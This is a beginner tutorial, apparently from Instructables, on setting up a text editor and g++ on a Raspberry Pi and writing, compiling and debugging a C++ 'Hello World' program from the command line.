need ideas for debugging... (7) Nov 14 2005 typeinfo[] construction (11) Nov 11 2005 popen (3) Nov 10 2005 Stream and File understanding. (32) Nov 08 2005 Threads and concurrency (1) Nov 08 2005 Threads and concurrency (19) Nov 08 2005 Death by concurrency (12) Nov 07 2005 GDC question (1) Nov 04 2005 How to share 'version' info between files (5) Nov 02 2005 Simulating enum inheritance? (2) Nov 02 2005 DDOC with class templates (4) Oct 30 2005 rmi library (3) Oct 28 2005 a slew of questions about D... (22) Oct 25 2005 The power of static if! (A bit of fun) (36) Oct 24 2005 Buffered output (6) Oct 24 2005 Entity name shadowing: valid or not ? (3) Oct 24 2005 Access to serial ports in Windows (26) Oct 21 2005 Is heap scanning done conservatively? (2) Oct 21 2005 How to handle public: inside DDOC example section ? (4) Oct 20 2005 Ddoc question (2) Oct 20 2005 Exception handling - the basics (13) Oct 18 2005 Undocumented string functionality? (11) Oct 17 2005 XOR a bunch of data (4) Oct 14 2005 Thread.getThis() (4) Oct 14 2005 DDoc macro questions (usage)... (10) Oct 12 2005 readf? (15) Oct 10 2005 Duping an associative array (1) Oct 10 2005 Phobos - system.d (5) Oct 06 2005 requesting a few pointers (5) Oct 03 2005 Ddoc embedded D source (1) Oct 02 2005 opSlice question (3) Oct 02 2005 DDOC line breaks (2) Oct 01 2005 redirect input on windows (4) Oct 01 2005 Enums - no "out of range" checking? (4) Oct 01 2005 DMD's inline switch (3) Oct 01 2005 Rectangular Array Initialization (2) Oct 01 2005 Preprocessing with Build (5) Sep 30 2005 Class member functions (10) Sep 28 2005 Box data type (15) Sep 28 2005 std.math.round() - doc bug? (5) Sep 25 2005 Pointers and deleting objects (22) Sep 23 2005 Get current object in method (3) Sep 22 2005 portability tips (1) Sep 21 2005 winsamp refactored (1) Sep 20 2005 variable declaration question (5) Sep 20 2005 Questions on accessing D objects from C (1) Sep 20 2005 GC finalisation (5) Sep 19 2005 DDoc richness (10) Sep 18 2005 D and GMP (4) Sep 17 2005 Undefined Windows function (11) Sep 16 2005 Need help with .h conversion (4) Sep 14 2005 Re: Wanted: GDB-style debugging (9) Sep 14 2005 Assign values to static array (3) Sep 13 2005 [D newbie - long] A lot of questions about D: Binary Modules, Metadata, Memory Management (11) Sep 13 2005 Another question about making a .lib file (8) Sep 13 2005 Making a .lib in D (5) Sep 12 2005 how to... make a D library and distribute? (4) Sep 11 2005 sort keys in an associative array? (4) Sep 10 2005 C headers to D for opaque data types (2) Sep 09 2005 harmonia ocumentation? (4) Sep 09 2005 File reading and interpretation (2) Sep 08 2005 Displaying international characters (3) Sep 06 2005 libarary haeder (33) Sep 05 2005 pointer to member function (6) Aug 31 2005 unformatted output (4) Aug 31 2005 D license (18) Aug 31 2005 useful mixin (2) Aug 30 2005 DirectX9 D3D Tutorials (3) Aug 29 2005 std.boxer type query (6) Aug 25 2005 is this a bug? nested function visibility (2) Aug 22 2005 .length and lvalue? (4) Aug 21 2005 Associative Array w/ Boxes. (6) Aug 20 2005 What on earth is happening? Mutual dtors (4) Aug 20 2005 Uint/Int max/min functions/templates. (1) Aug 20 2005 Implicit conversion of int to uint (2) Aug 20 2005 opIndexAssign Question (3) Aug 19 2005 How to copy an object? (14) Aug 18 2005 FileException vs. Exception (5) Aug 17 2005 Null variadic parameter. (4) Aug 17 2005 painting arrays over arrays (3) Aug 17 2005 10's of threads + network == segfault (sample code) (13) Aug 17 2005 understanding the -profile output (1) Aug 17 2005 acquiring the contents of environment variables (7) Aug 16 2005 Std.boxer toString() w/ Objects or Structs. (7) Aug 15 2005 d threads primer (6) Aug 14 2005 Referring to labels in asm block (1) Aug 14 2005 Variadic opIndexAssign (4) Aug 14 2005 Using keywords as elements of module names? (3) Aug 13 2005 constructors of nested classes (1) Aug 13 2005 negative assertion support for RegExp? (8) Aug 13 2005 understanding string suffixes (12) Aug 12 2005 Inheriting Base Constructors? (4) Aug 12 2005 Need help on working with TypeInfo, typeid(), and typeof() (6) Aug 11 2005 Compile on Cygwin with gdc (3) Aug 10 2005 Api calls... (5) Aug 10 2005 Linker doesn't find a Win32 API function (5) Aug 09 2005 UTF8 Encoding: Again (11) Aug 09 2005 Miscelleanous Questions (6) Aug 09 2005 Converting C/C++ bit fields... (9) Aug 08 2005 Compiling D to x86 assembly (1) Aug 08 2005 Does D support tail recursion? (2) Aug 08 2005 Does D optimize for tail recursion (1) Aug 08 2005 Error: Stream is not seekable ERROR with v .129 (4) Aug 08 2005 Symbol Undefined (11) Aug 08 2005 export to .h (1) Aug 07 2005 D default directory module? (7) Aug 06 2005 undefined label (2) Aug 06 2005 Assert Error (3) Aug 06 2005 Small question on: typedef get opCall; (4) Aug 06 2005 Range and set. (2) Aug 05 2005 OpenSSL? (2) Aug 05 2005 Array.sort understanding need (5) Aug 04 2005 error msg not understood (2) Aug 04 2005 Linking dynamic D library with C. (6) Aug 04 2005 foreach annoyance (18) Aug 03 2005 Which "if" choice is faster? (22) Aug 02 2005 remaping arrays (6) Aug 02 2005 Equivalent to C++ iostream cout (3) Aug 02 2005 system("DOS COMMAND PROMPT"); (5) Aug 01 2005 Variadic arguments transmission (6) Aug 01 2005 Implementation of char[] std.string.toString(char) (9) Aug 01 2005 Are constructors thread-safe? (4) Jul 31 2005 Template alias parameters (3) Jul 30 2005 Numerical Index in Associative Foreach (11) Jul 27 2005 Array of Associative arrays (7) Jul 27 2005 macro help (5) Jul 24 2005 Module name clashes (3) Jul 24 2005 Memoize function in D (34) Jul 23 2005 (structed un)named enum (1) Jul 22 2005 implicit conversion of reference to bool? (4) Jul 22 2005 Help: Types Conversion libraries, where are thou? (4) Jul 22 2005 Error: Access Violation (2) Jul 21 2005 Howto call foreach for void[char[]] (3) Jul 20 2005 Can structs be used with associative arrays? (12) Jul 19 2005 another std.path problem: getBaseName (9) Jul 14 2005 void as Initializer? (4) Jul 11 2005 possible d error? (4) Jul 09 2005 std.path.getDirName is not working correct? (10) Jul 05 2005 Opening a file for writing (5) Jul 05 2005 threads (5) Jul 04 2005 How to check for a pre-existing type? (2) Jul 01 2005 Removing an array's last item(s)? (10) Jun 27 2005 size of C enum (3) Jun 27 2005 A newsgroup accessible by google groups (4) Jun 27 2005 run time dll loading (4) Jun 26 2005 Problem derrivering nested in child class from nested in parent. (12) Jun 25 2005 A couple of questions re structs (4) Jun 23 2005 Clarification on aa.remove(key) (3) Jun 23 2005 Bind to any port and get it after binding. (2) Jun 23 2005 Howto "pass" exception. (2) Jun 23 2005 How-to programmatically compose email? (4) Jun 22 2005 struct vs. internal class (6) Jun 21 2005 Casting (8) Jun 21 2005 std.string.toString() methods cause confusion (6) Jun 20 2005 Compiling + Linking : please check ! (4) Jun 19 2005 Array indexing & typedef (26) Jun 19 2005 Compiling+Linking problem : some black magic (4) Jun 19 2005 &this access violation (3) Jun 17 2005 error line number off by 1? Or not? (3) Jun 17 2005 Calling method on new instance of class (3) Jun 16 2005 Interfacing to C arrays of unknown size (6) Jun 15 2005 LOL - int array literals (and an idea) (2) Jun 14 2005 cooperation between D and C (15) Jun 14 2005 std.socket + sending of structs (8) Jun 12 2005 reading console in an 'endless' loop (4) Jun 10 2005 Error: undefined identifier remove (2) Jun 09 2005 Anonymous nested classes (7) Jun 07 2005 structs and bits (7) Jun 07 2005 Daemon app in D (15) Jun 05 2005 confused about appending arrays... (2) Jun 05 2005 Overload In (7) Jun 04 2005 No ZipArchive property 'opApply' (2) Jun 04 2005 should 'template MyT (T : Object)' match interface-types? (1) Jun 04 2005 templates in libraries (6) Jun 04 2005 inout and foreach elements (4) Jun 03 2005 operator* (2) Jun 02 2005 why is std.boxer.Box a struct and not a class? (10) Jun 01 2005 communicating with a com port (8) Jun 01 2005 calling another program (2) May 31 2005 reference error? (7) May 31 2005 about operators (5) May 30 2005 correct way to set a dynamic 2d array? (6) May 30 2005 collection classes (2) May 30 2005 DbC vs. argument checking (19) May 29 2005 typeid(SomeClass) == typeid(AnotherClass) -- what's the deal? (6) May 29 2005 Bits in Int / short / etc (8) May 28 2005 Inner class (5) May 28 2005 iftype on struct or class? (7) May 27 2005 C Macro to D (3) May 27 2005 Operators - be careful what you ask for (1) May 26 2005 Calling D code from C (3) May 25 2005 Using Win32 console functions in D (5) May 25 2005 What .brf files are for? (2) May 24 2005 Can we turn off array's bounds-check? (10) May 24 2005 debug d code (2) May 22 2005 D(...) to call another D(...) (7) May 19 2005 Adding include directories in sc.ini (5) May 19 2005 std.loader and libs (2) May 19 2005 strings (10) May 18 2005 Overriding debug levels (1) May 18 2005 Debug Statement (1) May 18 2005 Documentation/InputStream bug? (3) May 18 2005 Template Stream Problems (5) May 18 2005 amd64 (3) May 18 2005 Headers, segfaults and other pains part II (1) May 18 2005 Header headaches part 2 (13) May 18 2005 Headers, segfaults and other pains PART I (1) May 17 2005 Segfaults, C-headers and other pains (1) May 17 2005 1 more header file conversion question (5) May 17 2005 "length" Symbol Conflict (4) May 16 2005 MD5 -- My First D Class (comments, please) (1) May 16 2005 SegFault from Unit-Test (4) May 16 2005 Memory management and Html embeded (15) May 15 2005 Help converting a headerfile to D (4) May 15 2005 inline assembler - far jump (3) May 15 2005 recls_time_t to d_time? (5) May 14 2005 MinWin with dmd 0.121 (8) May 14 2005 Unit tests for libraries (4) May 13 2005 D f(...) to C f(va_list) (7) May 12 2005 int to bit (6) May 11 2005 Pseudo member functions (11) May 11 2005 Poor error messages (3) May 11 2005 linking with a C library (6) May 09 2005 Meaning of in, out and inout (5) May 09 2005 bit vs. bool?! (8) May 09 2005 feedback wanted: DLlist.d - doubly linked list implementation in (11) May 09 2005 File / BufferedFile / MmFile (2) May 09 2005 build preprocessor ... (2) May 08 2005 Questions about destructors, threads, SDL, OpenGL and GC (3) May 06 2005 wchar[] literals (5) May 05 2005 Structure of D Applications (2) May 04 2005 D Documentation (8) May 03 2005 Still can't find function definitions in the Libs (4) May 01 2005 Designing a DLL for a non-GC language (2) Apr 30 2005 std.stream.stdin.eof() and pipes - do they work together? (3) Apr 30 2005 SDL with D (2) Apr 29 2005 installation on Win32 (42) Apr 29 2005 portability questions (3) Apr 28 2005 Integrate Platform SDK with << D >> language (1) Apr 26 2005 Undefined symbol when linking correct library (3) Apr 26 2005 Problem with imports in class hierarchy (5) Apr 25 2005 AA with objects on windows (6) Apr 24 2005 D libraries (DLLs and LIBs) from C (10) Apr 23 2005 mixins: declaration scope (2) Apr 22 2005 corrupt stack? gdb bt (3) Apr 22 2005 How to get whole env. (5) Apr 22 2005 RTF formatting (3) Apr 21 2005 Compiler not recognizing certain structs, types? (10) Apr 21 2005 Name mangling (3) Apr 19 2005 Windows 2000 Service and D (8) Apr 19 2005 Passing array to ctor (3) Apr 18 2005 Dynamic arrays, Associative arrays, etc... (13) Apr 17 2005 capturing process output on windows (20) Apr 17 2005 problem understanding struct sizes v class sizes (7) Apr 17 2005 Is there something special about globals I don't understand? (4) Apr 17 2005 dsource and svn (3) Apr 17 2005 handling module ctor exceptions (5) Apr 16 2005 class member access (6) Apr 16 2005 Access Violation: Maybe it's my fault? (4) Apr 15 2005 Accessing class members (12) Apr 15 2005 Error 42: (10) Apr 14 2005 Storing classes in an array. (4) Apr 13 2005 Function and variable assignment (2) Apr 12 2005 interface idispatch (21) Apr 11 2005 calling C functions findfirst etc (15) Apr 09 2005 InBuffer (8) Apr 09 2005 Does anyone have examples of GTK code in D? (20) Apr 09 2005 Any good approach for making plug-in? (1) Apr 09 2005 strtok? (3) Apr 08 2005 Linking problems with mintl (4) Apr 07 2005 how to debug ? (1) Apr 07 2005 GC and big non-binary trees (5) Apr 07 2005 Reentrant Lock (3) Apr 07 2005 Changing the size of an foreach() argument (2) Apr 06 2005 Templates + protection attributes problem (4) Apr 05 2005 garbage collector in seperate thread? (6) Apr 04 2005 std.date.parse not very smart (4) Apr 04 2005 Time and space, physical values? (1) Apr 04 2005 Threads not independent... (13) Apr 04 2005 phobos->RegExp (4) Apr 04 2005 sscanf() and using \ in format = no workie? (6) Apr 01 2005 How to convert va_start macro to D function? (3) Mar 31 2005 toInt() to critical of string input? (3) Mar 31 2005 Filename expansion under DOS box? (20) Mar 31 2005 sscanf() and string "reads" via %s? (9) Mar 31 2005 version() used in multiple special cases? (2) Mar 31 2005 typeid(obj) vs obj.typeinfo (1) Mar 31 2005 AA as lvalue (7) Mar 30 2005 Virtual functions and modules (1) Mar 30 2005 New feature for std.string suggestion: locate() (3) Mar 30 2005 calling dll functions (2) Mar 30 2005 writef and structs (3) Mar 30 2005 How to port a C++ library? (8) Mar 30 2005 Can I convert function to delegate ? (5) Mar 29 2005 C's sscanf in D? (2) Mar 29 2005 Copying int[] from dynamic to static arrays? (2) Mar 29 2005 array length is an unsigned value (1) Mar 29 2005 writefln not liking % in strings!? (3) Mar 29 2005 Chars ASCII 128+ in Literals? (8) Mar 29 2005 Stack or heap? (11) Mar 27 2005 void[] or ubyte[] ? (4) Mar 27 2005 Reading large files, writing large files? (22) Mar 27 2005 Object reference comparisons. (5) Mar 27 2005 Associative Arrays - Initialize via [ value, value, ...] ? (4) Mar 26 2005 3D Arrays - Non-block Arrays possible? (3) Mar 26 2005 Function overloading (not working as expected) (2) Mar 26 2005 foreach and changing the aggregate's values? (3) Mar 25 2005 Access violation using append/concatenate operator "~" (8) Mar 25 2005 toString conflic importing std.string & std.date? (4) Mar 25 2005 Good way to get a file's datestamp? (5) Mar 25 2005 write and read in one line (4) Mar 24 2005 converting from macro to function (4) Mar 24 2005 Changing to UTF-8 (6) Mar 23 2005 writef / writefln and passing output to a file (4) Mar 23 2005 Destructors for structs (7) Mar 22 2005 Window procedure declaration (13) Mar 22 2005 Formatting strings into columns via format? (1) Mar 22 2005 Error runtime feedback of D too short? (3) Mar 22 2005 Initializing global arrays in modules via this()? (4) Mar 22 2005 String concat ~ with auto toString() feature? (6) Mar 21 2005 dchar counting in a char[] (2) Mar 21 2005 how to set struct alignof? (5) Mar 21 2005 Counting the number of elements in int[] ? (5) Mar 21 2005 Concat or add ~. Is this a bug? (5) Mar 21 2005 program software versions (12) Mar 21 2005 Playing const char[]s into an Array? (6) Mar 21 2005 getAttributes (5) Mar 21 2005 Why does this work? (2) Mar 20 2005 String Parsing with \" in a ".." text line (25) Mar 20 2005 Opening, reading and writing to files in binary mode (5) Mar 20 2005 is there a way to enforce module 'namespace' semantics? (14) Mar 20 2005 Accessing class member methods (5) Mar 20 2005 Wrong Learn link? (3) Mar 20 2005 Reading and writing a text file (11) Mar 19 2005 Read text file, line by line? (22) Mar 18 2005 Win32: Console in GUI application (2) Mar 18 2005 "Error: Error: conversion 8," (7) Mar 17 2005 Is there any Libjpeg D port? (4) Mar 17 2005 Testing for empty/indefinded Stings? (5) Mar 17 2005 Timing Code - Read Time-Stamp Counter + Message? (2) (1) Mar 17 2005 copy char to char[] (7) Mar 17 2005 Timing Code - Read Time-Stamp Counter + Message? (4) Mar 16 2005 D Tutorials (16) Mar 16 2005 Copy-on-Write using toupper() source example? (6) Mar 16 2005 Fast Memory Allocation Strategy (9) Mar 16 2005 Almost first post (1) Mar 16 2005 Announcing new newsgroups (2) Mar 16 2005 Test (4) Other years: 2017 2016 2015 2014 2013 2012 2011 2010 2009 2008 2007 2006 2005
http://www.digitalmars.com/d/archives/digitalmars/D/learn/index2005.html
CC-MAIN-2017-22
refinedweb
3,414
68.6
I came across a method today that has the following at the end of it: return in_array($id, $arr[0]) && in_array($this->id, $arr[1]); Now help me understand this... That line basically says, "return TRUE if BOTH in_array functions return TRUE," correct? Otherwise, I'm assuming it would return FALSE because no other return statements exist in the method. Is the form that's used here done a lot? I've never seen it done this way... Usually, you only see a singular return statement. Hi, Yeah you're right about what it does. As long as the expression after the return statement only evaluates to a single value then PHP won't have a problem with it. in_array returns a boolean -- true if the element is in in the array, false if it's notexpression && expression "returns" (or evaluates to) a boolean -- true if both expressions are true, false if either or both expressions are false in_array expression && expression So in total the function returns a boolean -- true if both elements are in their respective arrays, or false if either or both elements aren't in their respective arrays. This form isn't used a whole lot, but you do see it every once in a while. Another thing I'm reminded off by looking at this is that the following also confuses people a lot class Something { public $somevar; public function foo() { return $this->somevar = 5; } } Which at the same time (compare to if (($pos = strpos($haystack, $needle)) !== false) which can be similarly confusing) if (($pos = strpos($haystack, $needle)) !== false) For a complete list of logical operators like && see for readability, i'd have wrapped it in a set of parenthesis (just to avoid potential confusion of precedence; does it evaluate as (return function1()) && function2() or return (function1() && function2()) ), but yeah... This topic is now closed. New replies are no longer allowed.
http://community.sitepoint.com/t/understanding-the-logic-with-2-returns/30416
CC-MAIN-2015-22
refinedweb
315
59.84
> no problem here, but I think we will need another one,> or some smart way to do the network isolation (layer 3)> for the network namespace (as alternative to the layer 2> approach) ...My feeling (Dmitry and Daniel can correct me) is that it will beaddressed with an unshare-like flag : NETNS2 and NETNS3.> as they are both complementary in some way, I'm not sure> a single space will suffice ...hmm, so you think there could be a 2 differents namespacesfor network to handle layer 2 or 3. Couldn't that be just a sub partof net_namespace.C.-To unsubscribe from this list: send the line "unsubscribe linux-kernel" inthe body of a message to majordomo@vger.kernel.orgMore majordomo info at read the FAQ at
https://lkml.org/lkml/2006/11/22/100
CC-MAIN-2015-22
refinedweb
127
71.24
Once you’ve prepared your iOS project to use Liferay Screens, you can use Screenlets in your app. There are plenty of Liferay Screenlets available, and they’re described in the Screenlet reference documentation. This tutorial shows you how to insert and configure Screenlets in iOS apps written in Swift and Objective-C. It also explains how to localize them. You’ll be a Screenlet master in no time! Inserting and Configuring Screenlets in iOS Apps The first step to using Screenlets in your iOS project is to add a new UIView to your project. In Interface Builder, insert a new UIView into your Storyboard or XIB file. Figure 1 shows this. Figure 1: Add a new UIView to your project. Next, enter the Screenlet’s name as the Custom Class. For example, if you’re using the Login Screenlet, then enter Login Screenlet as the class. Figure 2: Change the Custom Class to match the Screenlet. Now you need to conform the Screenlet’s delegate protocol in your ViewController class. For example, the Login Screenlet’s delegate class is LoginScreenletDelegate. This is shown in the code that follows. Note that you need to implement the functionality of onLoginResponse and onLoginError. This is indicated by the comments in the code here: class ViewController: UIViewController, LoginScreenletDelegate { ... func screenlet(screenlet: BaseScreenlet, onLoginResponseUserAttributes attributes: [String:AnyObject]) { // handle succeeded login using passed user attributes } func screenlet(screenlet: BaseScreenlet, onLoginError error: NSError) { // handle failed login using passed error } ... If you’re using CocoaPods, you need to import Liferay Screens in your View Controller: import LiferayScreens Now that the Screenlet’s delegate protocol conforms in your ViewController class, go back to Interface Builder and connect the Screenlet’s delegate to your View Controller. If the Screenlet you’re using has more outlets, you can assign them as well. Note that currently Xcode has some issues connecting outlets to Swift source code. To get around this, you can change the delegate data type or assign the outlets in your code. In your View Controller, follow these steps: Declare an outlet to hold a reference to the Screenlet. You can connect it in Interface Builder without any issues. Figure 3: Connect the outlet with the Screenlet reference. Assign the Screenlet’s delegate the viewDidLoadmethod. This is the connection typically done in Interface Builder. These steps are shown in the following code for Login Screenlet’s View Controller. class ViewController: UIViewController, LoginScreenletDelegate { @IBOutlet var screenlet: LoginScreenlet? override func viewDidLoad() { super.viewDidLoad() self.screenlet?.delegate = self } ... Figure 4: Connect the Screenlet's delegate in Interface Builder. Awesome! Now you know how to use Screenlets in your apps. If you need to use Screenlets from Objective-C code, follow the instructions in the next section. Using Screenlets from Objective-C If you want to invoke Screenlet classes from Objective-C code, there is an additional header file that you must import. You can import the header file LiferayScreens-Swift.h in all your Objective-C files or configure a precompiler header file. The first option involves adding the following import line all of your Objective-C files: #import "LiferayScreens-Swift.h" Alternatively, you can configure a precompiler header file by following these steps: Create a precompiler header file (e.g., PrefixHeader.pch) and add it to your project. Import LiferayScreens-Swift.hin the precompiler header file you just created. Edit the following build settings of your target. Remember to replace path/to/your/file/with the path to your PrefixHeader.pchfile: - Precompile Prefix Header: Yes - Prefix Header: path/to/your/file/PrefixHeader.pch Figure 5: The `PrefixHeader.pch` configuration in Xcode settings. You can use the precompiler header file PrefixHeader.pch as a template. Super! Now you know how to use Screenlets from Objective-C code in your apps. Localizing Screenlets Follow Apple’s standard mechanism to implement localization in your Screenlet. Note: even though a Screenlet may support several languages, you must also support those languages in your app. In other words, a Screenlet’s support for a language is only valid if your app supports that language. To support a language, make sure to add it as a localization in your project’s settings. Figure 6: The Xcode localizations in the project's settings. Way to go! You now know how to use Screenlets in your iOS apps. Related Topics Preparing iOS Projects for Liferay Screens Using Themes in iOS Screenlets Using Screenlets in Android apps
https://help.liferay.com/hc/ja/articles/360017881492-Using-Screenlets-in-iOS-Apps
CC-MAIN-2022-27
refinedweb
737
58.99
import java.text.NumberFormat; /** * @author Alfons Jose Pineda-Knauseder * @version 1.0.0 * *This class can be used to represent any products and their information. */ public class Product { private String code; private String description; private double price; public Product() { this("", "", 0); } /** * @param code The code for your product should be entered here as a <code>String</code>. * @param description This should be a <code>String</code> that describes your product. * @param price This should be the price of your product as a <code>double</code> value. */ public Product(String code, String description, double price) { this.code = code; this.description = description; this.price = price; } public void setCode(String code) { this.code = code; } /** * * @return <code>String<); } public boolean equals(Object object) { if (object instanceof Product) { Product product2 = (Product) object; if ( code.equals(product2.getCode()) && description.equals(product2.getDescription()) && price == product2.getPrice() ) return true; } return false; } public String toString() { return "Code: " + code + "\n" + "Description: " + description + "\n" + "Price: " + this.getFormattedPrice() + "\n"; } } I need assistance with javadocPage 1 of 1 3 Replies - 479 Views - Last Post: 17 May 2014 - 03:46 PM #1 I need assistance with javadoc Posted 17 May 2014 - 02:00 PM I am trying out Javadoc, but the description for my class aren't working. It is blank when I am trying to enter the description. I would like someone to help me. Here is my code. Replies To: I need assistance with javadoc #2 Re: I need assistance with javadoc Posted 17 May 2014 - 02:22 PM Most of your code is undocumented #3 Re: I need assistance with javadoc Posted 17 May 2014 - 02:42 PM g00se, on 17 May 2014 - 02:22 PM, said: Most of your code is undocumented /** 04 * @author Alfons Jose Pineda-Knauseder 05 * @version 1.0.0 06 * 07 *This class can be used to represent any products and their information. 08 */ 09 public class Product 10 { 11 private String code; 12 private String description; 13 private double price; 14 15 public Product() 16 { 17 this("", "", 0); 18 } I specifically want the description for this class. It is not working. I want also like to point out that my <code></code> tags are not working for some reason as well. #4 Re: I need assistance with javadoc Posted 17 May 2014 - 03:46 PM Alright everybody, I figured out the solution by myself. For future reference, any documentation you put after the @version or @author dags will be part of that tag even if it is on a different line. I just had to put my description above those. Page 1 of 1
http://www.dreamincode.net/forums/topic/347105-i-need-assistance-with-javadoc/
CC-MAIN-2016-50
refinedweb
429
64.1
This is totally from memory, and untested, but it should get you started. Requires: Python WebLog classes to use: cat access_log | ./script_filename <----- cut here -----> #!/usr/bin/env python from weblog import squid, url import sys o_log = squid.AccessParser(sys.stdin) log = url.Parser(o_log) domains = {} while log.getlogent(): if log.log_tag is not 'TCP_DENIED': domain = make_domain(log.url_host) domains[domain] = domains[domain] + 1 for domain in domains.keys(): print domain make_domain(host): ''' take a fully-qualified hostname and return the domain. Many ways to do this. ''' import string parts = string.split(host, '.') if parts[-1] in ['com', 'org', 'net', 'edu', 'gov', 'mil']: return string.join(parts[-2:], '.') else: return string.join(parts[-3:], '.') <----- cut here -----> > -----Original Message----- > From: Francis A. Vidal [mailto:francis@usls.edu] > Sent: Monday, October 05, 1998 3:45 PM > To: Squid Users List > Subject: OFF-TOPIC: Help on script > > > hello everyone, > > i'm trying to build a list of sites that i want to ban. i'm > getting the > list from the logfile of all the sites that have been visited by all > users. > > this is the format of the logfile: > > 907389399.705 61 192.168.2.57 TCP_HIT/200 2172 GET > - NONE/- > image/gif > > can someone help me on creating a script that will extract all domains > that has no TCP_DENIED tag to a file with no duplication? i'm > not familiar > with sed, gawk or perl so i need your help on this. > > i would like the format to be (from the above example) one domain per > line: > > excite.com > > > > thanks! > > --- > u s l s N E T university of st. la salle, bacolod city, philippines > . . . . . . . PGP key at > francis vidal tel. nos. (6334).435.2324 / 433.3526 > Received on Sun Oct 04 1998 - 23:06:31 MDT This archive was generated by hypermail pre-2.1.9 : Tue Dec 09 2003 - 16:42:20 MST
http://www.squid-cache.org/mail-archive/squid-users/199810/0059.html
crawl-001
refinedweb
312
78.55
Hello Instructables! This is my first 'ible, and centered on my favorite hobby. Computer programming! This is no ordinary programming introduction however, as the whole process is 100% compatible, and in fact dedicated to the Raspberry Pi! (I also created this instructable on my pi. It was a little painstaking because I had to use Chromium browser, and anyone who has a pi knows that it is not exactly snappy :) ) The language used in this 'ible will be C++ and the interface through the command line because it is MUCH faster on the pi than trying to use Code::Blocks or some other IDE. Enough blather let's get to it! P.S. I am entering this in the coding contest, so if you like it I would LOVE your vote :D Step 1: Step 2: Prerequisites I will assume no knowledge of the topics in this 'ible, so let us start with the prebasics shall we? First of all, you will need a text editor. Preferably one that does syntax highlighting. Here are a few of my faves, and the commands to install them. (Note. I will be using Vim for the instructible for simplicity, so grab this one if you have no idea what to do.) First off, open a terminal, or use the login shell on your pi (Or other Linux box) Vim: Command-line text editor with lexer/syntax highlighting. Line number display is default in the lower right hand corner. SciTe: GUI editor. also has lexer/syntax highlighting for MANY languages. Line numbering can be turned on in menu/view/line numbering Nano: Command line text editor shipped default with Raspbian, no line numbering but a simple interface. Has syntax/lexer highlighting for at least shell scripting and C++ To install any of these, type into the shell "sudo apt-get install <Name of editor here minus <>>" If you have not updated your package lists recently, type "sudo apt-get update" to refresh the lists. (If you have no idea what I am talking about when I say package lists, type it because yours are old. The package lists hold all the package names available to download.) You will also need g++ compiler for c++. Type "sudo apt-get install g++" to get it. Okay. Enough boring downloading of software! let's get to making our own already. Step 3: Before the .exe Comes the Code... Well, now that you have downloaded and installed a highlighting text editor, you can get to the tortuous heaven of creating your very own gadgets/schedulers/multiphysics simulators. WAIT I forgot. we need to go through writing C++ code first... Well, let's dive right in. Make your first project file in the terminal by doing something like this: --Create a directory for all your projects like this: <pi@raspberry ~>mkdir /home/pi/Documents/c++ --Navigate into your new directory: <pi@raspberry ~>cd /home/pi/Documents/c++ --Create a directory for this specific project like this: <pi@raspberry ~>mkdir ./helloworld --Navigate into your project directory <pi@raspberry ~>cd ./helloworld Okey dokey. Now you have a whole directory dedicated to your project. Time to get coding. You can create a new C++ file and open vim at the same time by entering the command: vim main.cpp This will create a C++ file called "Main.cpp" in your project folder and enter the Vim CUI. Begin by typing into Vim: :syntax on Including the colon. This is a Vim command-line instruction. It activates syntax highlighting. After this is done, press i on the keyboard to enter into editing mode. The complete code for the ubiquitous Hello World program is below: #include <iostream> int main() { std::cout << "Hello World!" << std::endl; } Now, let's talk a little bit about this. Step 4: Teach a Man to Fish... It is all well and good to splice code snippets together, but to make anything totally original, you need to know the SYNTAX and, (arguably) less important conventions for the language you are trying to use. I will also go over several common C++ types, loops etc. In the example: #include <iostream> int main() { std::cout << "Hello World!" << std::endl; return 0; } I want you to notice several things. Firstly, the "#include" statement in the top line. This is called a header file, and the net result of including it, causes the code within the header to be "pasted" on top of yours. This is useful if you need to use libraries or create custom classes, the latter out of he scope of this 'ible. I used the include statement to include the iostream header of the standard library into my code. This allows me to write to the standard output and read form the standard input. I used the std::cout object to print "Hello World!" to the shell. This is one of the several objects defined in iostream, which makes it the header that I use the most. Notice that the main part of my code is situated between a set of curly braces after a line that says simply "int main()". This is called a function. It is a block of C++ code that can be executed by calling it by name. Every C++ file meant for executable compilation needs a function called "main". This tells the computer where to start executing the code compiled by g++ to properly run the program. The parentheses after the function are a place to pass arguments to the function (an argument is a variable or constant that can be provided to the function to change its behavior). Beneath the std::cout, there is a "return" statement. This is for allowing the function to give back a value of its own type when called. for instance. in this function: int foo(int bar) { int foobar = bar * 5; return foobar; } Called like this: int barfoo = foo(10); would return 50 to be assigned to barfoo. Here is another vital syntax note. Every line needs a semicolon at the end UNLESS IT IS A FUNCTION, LOOP OR CONDITIONAL. Misplaced or unplaced semicolons will cause your code to not compile or to behave erratically. Now that we have some code let's compile it! Step 5: Soo... Why Did I Get G++ Again? Un-compiled, your code does not do much. It just kinda sits there looking like a Christmas tree with all its highlighting and being.. text.. So the next and last step in your journey to an executable is compilation! First you will need to save your code and exit Vim. To do this, hit the escape key to enter command mode, and enter the command ":x" This will save the file and exit to the shell. From there simply do this: <pi@raspberry ~>g++ ./main.cpp g++ will compile your code, and unless there are build errors will spit out a file called "a.out". To confirm, enter the command "ls" (ell ess) into the shell, and check for a file named "a.out". Execute your shiny new program like this: <pi@raspberry ~>./a.out You should see something like this: pi@skynet ~ $ mkdir ./Documents/c++ pi@skynet ~ $ cd ./Documents/c++ pi@skynet ~/Documents/c++ $ mkdir ./helloworld pi@skynet ~/Documents/c++ $ cd helloworld pi@skynet ~/Documents/c++/helloworld $ vim main.cpp pi@skynet ~/Documents/c++/helloworld $ g++ ./main.cpp pi@skynet ~/Documents/c++/helloworld $ ls a.out main.cpp pi@skynet ~/Documents/c++/helloworld $ ./a.out This is the line with your program output! \/\/\/ Hello World! pi@skynet ~/Documents/c++/helloworld $ Compiled and run! Give yourself a hug nice job. Step 6: Error Is the Spice of Life Ah you are still here! g++ gave you errors you say? hmm. Let's take a look. pi@skynet ~/Documents/c++/helloworld $ g++ ./main.cpp ./main.cpp: In function ‘int main()’: ./main.cpp:6:2: error: expected ‘;’ before ‘return’ pi@skynet ~/Documents/c++/helloworld $ Hmm. Looks like someone did not pay attention about the semicolons >.< First off, the compiler tells you that the error is in int main() in main.cpp. so let's look at our main file. Then it tells you that the error is on line 6! Yes, that line you so meticulously typed out. The compiler is the most thorough spellchecker known to man. Let's open Vim back up and take a look-see. vim ./main.cpp #include int main() { Caret\/ std::cout << "Hello World!" << std::endl || return 0; } ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ Line counter\/ ~ "main.cpp" 7L, 89C 6,1 All Okay, so we are on line six... AH! the compiler was right. let's fix that line and compile again after exiting Vim. It worked this time? Great! we can learn about a few other helpful things as 